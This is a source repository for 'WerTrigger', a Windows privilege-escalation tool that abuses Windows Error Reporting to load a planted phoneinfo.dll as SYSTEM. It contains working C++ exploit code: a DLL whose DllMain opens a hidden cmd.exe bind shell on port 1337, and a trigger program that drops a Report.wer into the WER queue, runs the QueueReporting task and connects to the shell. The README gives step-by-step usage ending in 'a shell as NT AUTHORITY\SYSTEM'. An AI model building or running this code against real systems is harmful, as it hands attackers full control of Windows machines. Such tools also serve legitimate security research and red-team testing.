├── bin ├── .v ├── Report.wer ├── WerTrigger.exe └── phoneinfo.dll ├── src ├── .text ├── phoneinfo │ ├── phoneinfo │ │ ├── phoneinfo.def │ │ ├── BindShell.h │ │ ├── framework.h │ │ ├── phoneinfo.vcxproj.user │ │ ├── pch.cpp │ │ ├── pch.h │ │ ├── phoneinfo.cpp │ │ ├── BindShell.cpp │ │ ├── phoneinfo.vcxproj.filters │ │ └── phoneinfo.vcxproj │ └── phoneinfo.sln └── WerTrigger │ ├── WerTrigger │ ├── WerTrigger.vcxproj.user │ ├── TcpClient.h │ ├── WerTrigger.vcxproj.filters │ ├── WerTrigger.cpp │ ├── TcpClient.cpp │ └── WerTrigger.vcxproj │ └── WerTrigger.sln ├── werTrigger.jpg └── README.md /bin/.v: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /src/.text: -------------------------------------------------------------------------------- 1 | test file 2 | -------------------------------------------------------------------------------- /bin/Report.wer: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/WerTrigger/HEAD/bin/Report.wer -------------------------------------------------------------------------------- /werTrigger.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/WerTrigger/HEAD/werTrigger.jpg -------------------------------------------------------------------------------- /bin/WerTrigger.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/WerTrigger/HEAD/bin/WerTrigger.exe -------------------------------------------------------------------------------- /bin/phoneinfo.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sailay1996/WerTrigger/HEAD/bin/phoneinfo.dll -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/phoneinfo.def: -------------------------------------------------------------------------------- 1 | LIBRARY phoneinfo 2 | 3 | EXPORTS 4 | DllMain PRIVATE 5 | BindMe PRIVATE 6 | 7 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/BindShell.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | class BindShell 4 | { 5 | public: 6 | BindShell(); 7 | ~BindShell(); 8 | 9 | int Run(unsigned short port); 10 | }; 11 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/framework.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 4 | // Windows Header Files 5 | #include 6 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/phoneinfo.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/WerTrigger.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/pch.cpp: -------------------------------------------------------------------------------- 1 | // pch.cpp: source file corresponding to the pre-compiled header 2 | 3 | #include "pch.h" 4 | 5 | // When you are using pre-compiled headers, this source file is necessary for compilation to succeed. 6 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/TcpClient.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #define WIN32_LEAN_AND_MEAN 4 | 5 | #include 6 | 7 | #define BUFSIZE 4096 8 | 9 | class TcpClient 10 | { 11 | public: 12 | TcpClient(); 13 | ~TcpClient(); 14 | 15 | int connectTCP(const char* hostname, const char* port); 16 | 17 | private: 18 | static DWORD WINAPI ReceiveDataFromSocket(LPVOID lpvParam); 19 | static DWORD WINAPI SendDataFromConsole(LPVOID lpvParam); 20 | }; 21 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | 13 | #endif //PCH_H 14 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/phoneinfo.cpp: -------------------------------------------------------------------------------- 1 | // phoneinfo.cpp : Defines the entry point for the DLL application. 2 | #include "pch.h" 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | 10 | #include "BindShell.h" 11 | 12 | #define BUFSIZE 1024 13 | 14 | 15 | HRESULT __stdcall BindMe() 16 | { 17 | BindShell bindShell; 18 | bindShell.Run(1337); 19 | 20 | return S_OK; 21 | } 22 | 23 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 24 | { 25 | switch (ul_reason_for_call) 26 | { 27 | case DLL_PROCESS_ATTACH: 28 | //xCall(L"DllMain()"); 29 | BindMe(); 30 | break; 31 | case DLL_THREAD_ATTACH: 32 | case DLL_THREAD_DETACH: 33 | case DLL_PROCESS_DETACH: 34 | break; 35 | } 36 | return TRUE; 37 | } 38 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/WerTrigger.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | Source Files 23 | 24 | 25 | 26 | 27 | Header Files 28 | 29 | 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # WerTrigger 2 | Weaponizing for privileged file writes bugs with windows problem reporting 3 | 4 | #### Short Description: 5 | I've found phoneinfo.dll (which is missing in system32 dir) has been loaded by wermgr.exe (windows problem reporting) when I enable boot logging in Procmon. It mean, `phoneinfo.dll` is loaded after reboot. Then, I asked to [@jonasLyk](https://twitter.com/jonasLyk) that can I trigger to load `phoneinfo.dll` without reboot and he said "yes!". And then, This trigger was happened. 6 | 7 | #### *Note:* 8 | *you can also use [@it4man](https://twitter.com/itm4n)'s [UsoDllLoader](https://github.com/itm4n/UsoDllLoader) as a weapon for privileged file writes bugs and also there's another techniques at here [FileWrite2system](https://github.com/sailay1996/awesome_windows_logical_bugs/blob/master/FileWrite2system.txt)* 9 | 10 | #### For testing purposes: 11 | 1. **As an administrator**, copy `phoneinfo.dll` to `C:\Windows\System32\` 12 | 2. Place `Report.wer` file and `WerTrigger.exe` in a same directory. 13 | 3. Then, run `WerTrigger.exe`. 14 | 4. Enjoy a shell as NT AUTHORITY\SYSTEM. 15 | 16 | ![test1](https://github.com/sailay1996/WerTrigger/blob/master/werTrigger.jpg) 17 | 18 | *by [@404death](https://twitter.com/404death)* 19 | 20 | *Thanks to: [@jonasLyk](https://twitter.com/jonasLyk) for giving advice which is `without reboot technique`* 21 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/BindShell.cpp: -------------------------------------------------------------------------------- 1 | #include "pch.h" 2 | 3 | #include 4 | 5 | #include "BindShell.h" 6 | 7 | #pragma comment(lib, "Ws2_32.lib") 8 | 9 | BindShell::BindShell() 10 | { 11 | 12 | } 13 | 14 | BindShell::~BindShell() 15 | { 16 | WSACleanup(); 17 | } 18 | 19 | int BindShell::Run(unsigned short port) 20 | { 21 | WSADATA WSAData; 22 | SOCKADDR_IN sin; 23 | SOCKET sock; 24 | 25 | if (!WSAStartup(MAKEWORD(2, 0), &WSAData)) 26 | { 27 | sock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0); 28 | sin.sin_family = AF_INET; 29 | sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK); // INADDR_ANY 30 | sin.sin_port = htons(port); 31 | 32 | if (!bind(sock, (SOCKADDR*)& sin, sizeof(SOCKADDR_IN))) 33 | { 34 | listen(sock, SOMAXCONN); 35 | 36 | SOCKET tmp = accept(sock, 0, 0); 37 | STARTUPINFO si = { 0 }; 38 | PROCESS_INFORMATION pi = { 0 }; 39 | wchar_t buff[2010]; 40 | 41 | si.cb = sizeof(si); 42 | si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; 43 | si.wShowWindow = SW_HIDE; 44 | si.hStdOutput = (HANDLE)tmp; 45 | si.hStdError = (HANDLE)tmp; 46 | si.hStdInput = (HANDLE)tmp; 47 | 48 | GetEnvironmentVariable(L"COMSPEC", buff, 2000); 49 | 50 | CreateProcess(buff, 0, 0, 0, true, CREATE_NEW_CONSOLE, 0, 0, &si, &pi); 51 | 52 | WaitForSingleObject(pi.hProcess, INFINITE); 53 | 54 | CloseHandle(pi.hProcess); 55 | CloseHandle(pi.hThread); 56 | 57 | closesocket(tmp); 58 | } 59 | } 60 | 61 | return 0; 62 | } 63 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29709.97 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "phoneinfo", "phoneinfo\phoneinfo.vcxproj", "{64CCD6B9-CF59-4A19-AA05-64D65712E4B3}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Debug|x64.ActiveCfg = Debug|x64 17 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Debug|x64.Build.0 = Debug|x64 18 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Debug|x86.ActiveCfg = Debug|Win32 19 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Debug|x86.Build.0 = Debug|Win32 20 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Release|x64.ActiveCfg = Release|x64 21 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Release|x64.Build.0 = Release|x64 22 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Release|x86.ActiveCfg = Release|Win32 23 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {D848926A-9000-4995-98B0-B1C0D724FB75} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29709.97 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "WerTrigger", "WerTrigger\WerTrigger.vcxproj", "{CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Debug|x64.ActiveCfg = Debug|x64 17 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Debug|x64.Build.0 = Debug|x64 18 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Debug|x86.ActiveCfg = Debug|Win32 19 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Debug|x86.Build.0 = Debug|Win32 20 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Release|x64.ActiveCfg = Release|x64 21 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Release|x64.Build.0 = Release|x64 22 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Release|x86.ActiveCfg = Release|Win32 23 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {6815CE15-B02F-4456-A4D4-2481782195C1} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/phoneinfo.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Header Files 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | 40 | 41 | Source Files 42 | 43 | 44 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/WerTrigger.cpp: -------------------------------------------------------------------------------- 1 | // WerTrigger.cpp : Windows Error Reporting Trigger by @404death ! 2 | // 3 | #include 4 | #include 5 | #include 6 | #include "TcpClient.h" 7 | 8 | #define BUFSIZE 4096 9 | 10 | int wmain(int argc, wchar_t** argv) 11 | { 12 | 13 | STARTUPINFO si; 14 | PROCESS_INFORMATION pi; 15 | 16 | ZeroMemory(&si, sizeof(STARTUPINFO)); 17 | ZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); 18 | 19 | si.cb = sizeof(STARTUPINFO); 20 | 21 | // return S_OK; 22 | 23 | wprintf_s(L"[+] Windows Error Reporting Trigger by @404death !\n"); 24 | 25 | CreateDirectoryW(L"c:\\programdata\\microsoft\\windows\\wer\\reportqueue\\a_b_c_d_e", NULL); 26 | 27 | CopyFileW(L"Report.wer", L"c:\\programdata\\microsoft\\windows\\wer\\reportqueue\\a_b_c_d_e\\Report.wer", true); 28 | 29 | // submitting problem report with schtasks 30 | 31 | WCHAR cmdLine4[BUFSIZE]; 32 | ZeroMemory(cmdLine4, BUFSIZE); 33 | StringCchCat(cmdLine4, BUFSIZE, L"cmd /c SCHTASKS /RUN /TN \"Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\" > nul 2>&1"); 34 | 35 | CreateProcess(nullptr, cmdLine4, nullptr, nullptr, FALSE, 0, nullptr, nullptr, &si, &pi); 36 | 37 | CloseHandle(pi.hThread); 38 | CloseHandle(pi.hProcess); 39 | 40 | Sleep(2000); 41 | 42 | // clean dir 43 | DeleteFileW(L"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e\\Report.wer"); 44 | RemoveDirectoryW(L"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\a_b_c_d_e"); 45 | 46 | // TCP connecting 47 | 48 | TcpClient tcpClient; 49 | int iRes = 0; 50 | 51 | // Try to trigger DLL loading 52 | wprintf_s(L"[+] Trigger launched.\n"); 53 | wprintf_s(L"[*] TCP connecting...\n"); 54 | 55 | // Wait a bit before trying to connect to the bind shell. 56 | // 57 | wprintf_s(L"[*] Waiting for the DLL to be loaded...\n"); 58 | 59 | Sleep(2000); 60 | 61 | iRes = tcpClient.connectTCP("127.0.0.1", "1337"); 62 | 63 | if (iRes != 0) 64 | { 65 | wprintf_s(L"[*] Retrying ...\n"); 66 | 67 | iRes = tcpClient.connectTCP("127.0.0.1", "1337"); 68 | } 69 | 70 | if (iRes != 0) 71 | { 72 | wprintf_s(L"[*] Retrying ...\n"); 73 | 74 | 75 | iRes = tcpClient.connectTCP("127.0.0.1", "1337"); 76 | } 77 | 78 | if (iRes != 0) 79 | { 80 | wprintf_s(L"[-] Exploit failed."); 81 | } 82 | else 83 | { 84 | // system("taskkill /F /IM rundll32.exe /T > NUL 2>&1"); 85 | wprintf_s(L"[+] Exploit successfull."); 86 | } 87 | 88 | return 0; 89 | 90 | } 91 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/TcpClient.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "TcpClient.h" 7 | 8 | #pragma comment (lib, "Ws2_32.lib") 9 | #pragma comment (lib, "Mswsock.lib") 10 | #pragma comment (lib, "AdvApi32.lib") 11 | 12 | TcpClient::TcpClient() 13 | { 14 | 15 | } 16 | 17 | TcpClient::~TcpClient() 18 | { 19 | WSACleanup(); 20 | } 21 | 22 | int TcpClient::connectTCP(const char* hostname, const char* port) 23 | { 24 | WSADATA wsaData; 25 | SOCKET socketClient = INVALID_SOCKET; 26 | struct addrinfo* result = NULL, * ptr = NULL, hints; 27 | int iResult = 0; 28 | //int recvbuflen = BUFSIZE; 29 | DWORD dwThreadIdOut; 30 | DWORD dwThreadIdIn; 31 | HANDLE hThreadOut; 32 | HANDLE hThreadIn; 33 | 34 | // Initialize Winsock 35 | iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); 36 | if (iResult != 0) { 37 | wprintf_s(L"WSAStartup failed with error: %d\n", iResult); 38 | return 1; 39 | } 40 | 41 | ZeroMemory(&hints, sizeof(hints)); 42 | hints.ai_family = AF_UNSPEC; 43 | hints.ai_socktype = SOCK_STREAM; 44 | hints.ai_protocol = IPPROTO_TCP; 45 | 46 | // Resolve the server address and port 47 | iResult = getaddrinfo(hostname, port, &hints, &result); 48 | if (iResult != 0) { 49 | wprintf_s(L"getaddrinfo failed with error: %d\n", iResult); 50 | WSACleanup(); 51 | return 1; 52 | } 53 | 54 | // Attempt to connect to an address until one succeeds 55 | for (ptr = result; ptr != NULL; ptr = ptr->ai_next) { 56 | 57 | // Create a SOCKET for connecting to server 58 | socketClient = socket(ptr->ai_family, ptr->ai_socktype, 59 | ptr->ai_protocol); 60 | if (socketClient == INVALID_SOCKET) { 61 | wprintf_s(L"socket failed with error: %ld\n", WSAGetLastError()); 62 | WSACleanup(); 63 | return 1; 64 | } 65 | 66 | // Connect to server. 67 | iResult = connect(socketClient, ptr->ai_addr, (int)ptr->ai_addrlen); 68 | if (iResult == SOCKET_ERROR) { 69 | closesocket(socketClient); 70 | socketClient = INVALID_SOCKET; 71 | continue; 72 | } 73 | break; 74 | } 75 | 76 | freeaddrinfo(result); 77 | 78 | if (socketClient == INVALID_SOCKET) { 79 | wprintf_s(L"[-] Unable to connect to server!\n"); 80 | WSACleanup(); 81 | return 1; 82 | } 83 | 84 | // Create a thread to receive data from the socket in an infinite loop 85 | hThreadOut = CreateThread(NULL, 0, ReceiveDataFromSocket, (LPVOID)socketClient, 0, &dwThreadIdOut); 86 | if (hThreadOut == NULL) 87 | { 88 | wprintf_s(L"[-] Create thread failed: ReceiveDataFromSocket\n"); 89 | return -1; 90 | } 91 | 92 | // Create a thread to read user input in an infinite loop 93 | hThreadIn = CreateThread(NULL, 0, SendDataFromConsole, (LPVOID)socketClient, 0, &dwThreadIdIn); 94 | if (hThreadIn == NULL) 95 | { 96 | wprintf_s(L"[-] Create thread failed: SendDataFromConsole\n"); 97 | return -1; 98 | } 99 | wprintf_s(L"[+] phoneinfo.dll has been loaded.\n"); 100 | wprintf_s(L"[+] Connected.\n"); 101 | // wprintf_s(L"[+] TryMe to give you Spawning shell...\n"); 102 | wprintf_s(L"[+] Spawning shell...\n"); 103 | 104 | // Wait for the socket to be closed 105 | WaitForSingleObject(hThreadOut, INFINITE); 106 | 107 | // shutdown the connection since no more data will be sent 108 | iResult = shutdown(socketClient, SD_SEND); 109 | if (iResult == SOCKET_ERROR) { 110 | wprintf_s(L"shutdown failed with error: %d\n", WSAGetLastError()); 111 | closesocket(socketClient); 112 | WSACleanup(); 113 | return 1; 114 | } 115 | 116 | // cleanup 117 | CloseHandle(hThreadIn); 118 | CloseHandle(hThreadOut); 119 | closesocket(socketClient); 120 | WSACleanup(); 121 | 122 | return 0; 123 | } 124 | 125 | DWORD WINAPI TcpClient::ReceiveDataFromSocket(LPVOID lpvParam) 126 | { 127 | int iResult; 128 | SOCKET socketClient = (SOCKET)lpvParam; 129 | char bufReceive[BUFSIZE]; 130 | 131 | while (true) 132 | { 133 | ZeroMemory(bufReceive, BUFSIZE); 134 | iResult = recv(socketClient, bufReceive, BUFSIZE, 0); 135 | if (iResult > 0) 136 | { 137 | printf("%s", bufReceive); 138 | } 139 | else 140 | break; 141 | } 142 | return 0; 143 | } 144 | 145 | DWORD WINAPI TcpClient::SendDataFromConsole(LPVOID lpvParam) 146 | { 147 | HANDLE hStdin; 148 | BOOL bSuccess = FALSE; 149 | DWORD dwRead = 0; 150 | SOCKET socketClient = (SOCKET)lpvParam; 151 | int iResult = 0; 152 | char bufCmd[BUFSIZE]; 153 | char* pCr = { 0 }; 154 | char* pLf = { 0 }; 155 | 156 | // Get a handle on standard input 157 | hStdin = GetStdHandle(STD_INPUT_HANDLE); 158 | if (hStdin == INVALID_HANDLE_VALUE) 159 | return 1; 160 | 161 | while (true) 162 | { 163 | bSuccess = ReadFile(hStdin, bufCmd, BUFSIZE, &dwRead, NULL); 164 | if (bSuccess == FALSE) 165 | break; 166 | 167 | 168 | pCr = strchr(bufCmd, '\r'); 169 | if (pCr != NULL) 170 | { 171 | pLf = strchr(bufCmd, '\n'); 172 | if (pLf != NULL) 173 | { 174 | pCr[0] = '\n'; 175 | pLf[0] = 0; 176 | } 177 | } 178 | 179 | iResult = send(socketClient, bufCmd, (int)strlen(bufCmd), 0); 180 | if (iResult == SOCKET_ERROR) { 181 | printf("send failed with error: %d\n", WSAGetLastError()); 182 | break; 183 | } 184 | } 185 | return 0; 186 | } 187 | -------------------------------------------------------------------------------- /src/WerTrigger/WerTrigger/WerTrigger.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {CE1C7C24-40F0-4041-BC98-FCE5A2BAB63F} 24 | Win32Proj 25 | WerTrigger 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | 98 | 99 | 100 | 101 | 102 | 103 | Level3 104 | true 105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | 112 | 113 | 114 | 115 | 116 | 117 | Level3 118 | true 119 | true 120 | true 121 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 122 | true 123 | 124 | 125 | Console 126 | true 127 | true 128 | true 129 | 130 | 131 | 132 | 133 | 134 | 135 | Level3 136 | true 137 | true 138 | true 139 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 140 | true 141 | 142 | 143 | Console 144 | true 145 | true 146 | true 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | -------------------------------------------------------------------------------- /src/phoneinfo/phoneinfo/phoneinfo.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {64CCD6B9-CF59-4A19-AA05-64D65712E4B3} 24 | Win32Proj 25 | phoneinfo 26 | 10.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Use 88 | Level3 89 | true 90 | WIN32;_DEBUG;PHONEINFO_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 91 | true 92 | pch.h 93 | 94 | 95 | Console 96 | true 97 | phoneinfo.def 98 | 99 | 100 | 101 | 102 | Use 103 | Level3 104 | true 105 | _DEBUG;PHONEINFO_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 106 | true 107 | pch.h 108 | 109 | 110 | Console 111 | true 112 | phoneinfo.def 113 | 114 | 115 | 116 | 117 | Use 118 | Level3 119 | true 120 | true 121 | true 122 | WIN32;NDEBUG;PHONEINFO_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 123 | true 124 | pch.h 125 | 126 | 127 | Console 128 | true 129 | true 130 | false 131 | phoneinfo.def 132 | 133 | 134 | 135 | 136 | Use 137 | Level3 138 | true 139 | true 140 | true 141 | NDEBUG;PHONEINFO_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 142 | true 143 | pch.h 144 | 145 | 146 | Console 147 | true 148 | true 149 | false 150 | phoneinfo.def 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | Create 163 | Create 164 | Create 165 | Create 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | --------------------------------------------------------------------------------